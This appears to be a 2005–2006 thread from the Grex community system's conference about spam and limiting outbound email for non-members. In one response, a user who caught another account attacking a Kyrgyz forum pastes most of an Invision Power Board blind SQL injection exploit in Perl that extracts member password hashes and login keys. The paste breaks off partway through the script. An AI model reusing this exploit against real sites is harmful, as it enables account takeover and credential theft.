response 55 of 260:

Dec 30 16:29 UTC 2005

What do spammers give typically as a *return* address when they spam from
Grex? 

response 57 of 260:

Dec 30 20:10 UTC 2005

Re resp:54: The Exim email list is extremely helpful.  There's also a 
package of sample configurations that has a lot of useful stuff in it. 

response 59 of 260:

Dec 30 21:51 UTC 2005

SQL exploit hackers in action on Grex....

mirror   pf 62.33.88.166      4:13PM     4 perl ipb.pl http://forum.unix.kg
/ 4

 !more ~mirror/ipb.pl
#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) > 0){
 print qq{\b\b DONE ]

 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();
 }
else
 {
  $allchar .=chr($i);;
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }

sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }


Then under the "Pass nik" directory are a file for ID's and another...
NICE...NOT!

response 61 of 260:

Dec 30 22:50 UTC 2005

re #60
User "mirror" was running an SQL exploit via lynx and perl against a site in
Kyrgyzstan.  The files are in mirror's home directory.

response 63 of 260:

Dec 31 19:11 UTC 2005

Without some kind of control on outbound internet e-mail abuse, grex will soon
be unusable as an e-mail sender.  Among other commercial sites, here is a
blacklisting auto reply against grex from AOL:

AOL does not accept e-mail transactions from IP addresses which
generate complaints or transmit unsolicited bulk e-mail.

response 65 of 260:

Jan 2 03:37 UTC 2006

Thanks.  You can safely ignore this for the time being.  It will go away
when picospan is recompiled for the releaes of OpenBSD now running on grex.

response 67 of 260:

Jan 2 08:57 UTC 2006

Any chance you were running fronttalk this time, instead of picospan?

response 69 of 260:

Jan 2 16:39 UTC 2006

For what it's worth, members of my family are among those who have no other
email access.  (This is regarding what cross said, way back.)  You might
be surprised at how many users there are in this state.

response 71 of 260:

Jan 2 17:16 UTC 2006

I got the warning again about the picospan library.  I must simply not be
noticing it the rest of the time.  

Can't you just throttle mail usage for non-members instead?

response 73 of 260:

Jan 2 18:39 UTC 2006

What, again, is the point of turning off e-mail use for non-members, even if
there are few dependent upon it (which is yet to be established)? Non-members
are the future life of Grex as that's the group from which members come. 
If some misuse is the problem, why should that be the reason to punish others?

response 75 of 260:

Jan 2 19:41 UTC 2006

Won't people simply wait 48 hours before spamming then?

response 77 of 260:

Jan 3 03:13 UTC 2006

Sdf has a 1-month free trial period with greatly reduced privileges then you
can send in $1 to join, which spammers are not likely to do.  Would it be
worth the nuisance of making people send in $1 to use outgoing email?

response 79 of 260:

Jan 3 06:03 UTC 2006

Sending a dollar by US mail is not difficult.